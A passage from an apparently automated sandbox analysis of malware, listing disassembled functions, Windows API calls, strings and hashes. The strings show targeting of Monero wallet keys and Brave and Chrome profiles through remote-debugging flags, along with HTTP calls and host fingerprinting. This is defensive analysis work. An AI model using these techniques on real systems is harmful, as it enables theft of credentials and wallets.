                                        • Instruction ID: 17eaf4167952bfb316ad6ae3fd3060c57b872b3b0380796fb676015b8687f698
                                        • Opcode Fuzzy Hash: d9fa232a5445451b32881fdd4c9d181197175a9049a8f6cee32a7ba96fdc4687
                                        • Instruction Fuzzy Hash: 35F03A70B48209EBEF00EBE0DC8EFBD3374AB14B02F20061DB513A51A5DBB89501CB51
                                        Function 007B4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 091fab785d60116a4ffe14357f0e2d76f4df51852ef0e01fea05bde07f95d3bf
                                        • Instruction ID: e559c736c75f3471a6c10595710f60f756885dcbda59eb8b55256de427b6466f
                                        • Opcode Fuzzy Hash: 091fab785d60116a4ffe14357f0e2d76f4df51852ef0e01fea05bde07f95d3bf
                                        • Instruction Fuzzy Hash: C82130B1D00209ABDF14EFA4EC4ABDD7B75FB44351F108629F615A7290DB706A09CB91
                                        Function 007C5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B62D0: InternetOpenA.WININET(007D0DFF,00000001,00000000,00000000,00000000), ref: 007B6331
                                          • Part of subcall function 007B62D0: StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B6353
                                          • Part of subcall function 007B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6385
                                          • Part of subcall function 007B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B63D5
                                          • Part of subcall function 007B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B640F
                                          • Part of subcall function 007B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C5478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 35702b9aa517b1b50dc7da3a10cc866f3f2a5d8a88b76ac89ffef27220a37cb8
                                        • Instruction ID: 4802d9d8a77def83a7803d4128554b2f595ed15b4d7d7bcbb3f2f68b47d722c6
                                        • Opcode Fuzzy Hash: 35702b9aa517b1b50dc7da3a10cc866f3f2a5d8a88b76ac89ffef27220a37cb8
                                        • Instruction Fuzzy Hash: FF111C70A0010CFACB18FFA4D9AAFED7339AF50345F80855CF91A56592EB38AB04CB51
                                        Function 007C7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 007C7ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 7dd9f5efcb8ffddd7853708145a09ba5288bab42c664e3a04d72ccb404519531
                                        • Instruction ID: 5198c5274cbaed9c36e16a836ccfa71be08b599924c3502e813680e167cff6fb
                                        • Opcode Fuzzy Hash: 7dd9f5efcb8ffddd7853708145a09ba5288bab42c664e3a04d72ccb404519531
                                        • Instruction Fuzzy Hash: BF0186B1908249ABC714CF98DD85FAEBBB8F744711F10412EF505E2280E7789A00CBA1
                                        Function 007B1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 007B1132
                                        • ExitProcess.KERNEL32 ref: 007B1143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: e9e65de0e07dbf6483f6869810c47d858f5854b81510b4902ffa7dc5a920a1af
                                        • Instruction ID: 2252bc177265191f36afa9ddfb1aea6012f82e5b78aff6d486c8c23bf760efb6
                                        • Opcode Fuzzy Hash: e9e65de0e07dbf6483f6869810c47d858f5854b81510b4902ffa7dc5a920a1af
                                        • Instruction Fuzzy Hash: 6EE0867094930CFBE710ABD09C0EB8C766C9B04B01F600154F708761D0D6B465404B58
                                        Function 007B10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007B10B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007B10F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 80e11bd3a9bc4a3b9305f176b9edcdd8767ebb04e76f2873372424bfa0355818
                                        • Instruction ID: f6649813bb1bd0f0df5adba000de8c6d39b15b6972028d9691d078a76ddc0a2c
                                        • Opcode Fuzzy Hash: 80e11bd3a9bc4a3b9305f176b9edcdd8767ebb04e76f2873372424bfa0355818
                                        • Instruction Fuzzy Hash: CAF0E2B1641208BBE714AAA4AC59FAEB798E705B04F700448F500E3290D5719E00CBA0
                                        Function 007B1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007C7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7AA0
                                          • Part of subcall function 007C7A70: RtlAllocateHeap.NTDLL(00000000), ref: 007C7AA7
                                          • Part of subcall function 007C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007C7ABF
                                          • Part of subcall function 007C79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007B11B7), ref: 007C7A10
                                          • Part of subcall function 007C79E0: RtlAllocateHeap.NTDLL(00000000), ref: 007C7A17
                                          • Part of subcall function 007C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007C7A2F
                                        • ExitProcess.KERNEL32 ref: 007B11C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: b0ee3c0a34f32f6767970fc415cf5ad0c82901f36bd02148769a618244856caf
                                        • Instruction ID: bdd2a69cab4f80936cb7a259c2f8314003ef19663a5af09e3b675d8d3d63c38a
                                        • Opcode Fuzzy Hash: b0ee3c0a34f32f6767970fc415cf5ad0c82901f36bd02148769a618244856caf
                                        • Instruction Fuzzy Hash: 79E0E2B590820992DA14B7F9AC1AF6E339C5B1430AF40081CFA0886112EE29EC028666
                                        Function 00A9EFB2 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000), ref: 00A9F055
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 01bcdd83d92dc786f389c44039fd16c74aa125aa542449ff84dfc368baa3d902
                                        • Instruction ID: 310651c8b437aa056b231f3813787dfcb56c0de5eaf048c8e78d34e42eb0e74f
                                        • Opcode Fuzzy Hash: 01bcdd83d92dc786f389c44039fd16c74aa125aa542449ff84dfc368baa3d902
                                        • Instruction Fuzzy Hash: 75F058B1108608EFE7006F259C846BEFBF4EF95351F06081EDAC083721E27218908B47

                                        Non-executed Functions

                                        Function 007BBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,007D0B32,007D0B2F,00000000,?,?,?,007D1450,007D0B2E), ref: 007BBEC5
                                        • StrCmpCA.SHLWAPI(?,007D1454), ref: 007BBF33
                                        • StrCmpCA.SHLWAPI(?,007D1458), ref: 007BBF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BC8A9
                                        • FindClose.KERNEL32(000000FF), ref: 007BC8BB
                                        Strings
                                        • Preferences, xrefs: 007BC104
                                        • Brave, xrefs: 007BC0E8
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 007BC3B2
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 007BC495
                                        • \Brave\Preferences, xrefs: 007BC1C1
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 007BC534
                                        • Google Chrome, xrefs: 007BC6F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: 31017f05c92e26456dfa7a4ffd7fabc13b802e75abacdb20900974ee864fee3d
                                        • Instruction ID: e931af0da88956e21374f654ac333217686e8de025484996e830ef6935c95901
                                        • Opcode Fuzzy Hash: 31017f05c92e26456dfa7a4ffd7fabc13b802e75abacdb20900974ee864fee3d
                                        • Instruction Fuzzy Hash: 9352F2B2610108EBCB14FB60DD9AFEE733DAF54305F40459DB50A66191EE38AB48CF66
                                        Function 007C3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 007C3B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007C3B33
                                        • lstrcat.KERNEL32(?,?), ref: 007C3B85
                                        • StrCmpCA.SHLWAPI(?,007D0F58), ref: 007C3B97
                                        • StrCmpCA.SHLWAPI(?,007D0F5C), ref: 007C3BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007C3EB7
                                        • FindClose.KERNEL32(000000FF), ref: 007C3ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 88d042fab8f5c014683658f7167f6e24f03a42af556ee0bde84ac9d6bb5bc6e2
                                        • Instruction ID: a70007b143ee66c8b99dda648e14b2da17890200ba73d24b37457365770772b3
                                        • Opcode Fuzzy Hash: 88d042fab8f5c014683658f7167f6e24f03a42af556ee0bde84ac9d6bb5bc6e2
                                        • Instruction Fuzzy Hash: E4A13FB1A00218ABDB34DFA4DC89FEE7378AB48700F54858DF60D96191EB749B85CF61
                                        Function 007C4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 007C4B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 007C4B93
                                        • StrCmpCA.SHLWAPI(?,007D0FC4), ref: 007C4BC1
                                        • StrCmpCA.SHLWAPI(?,007D0FC8), ref: 007C4BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007C4DCD
                                        • FindClose.KERNEL32(000000FF), ref: 007C4DE2
                                        Strings
                                        Memory Dump Source
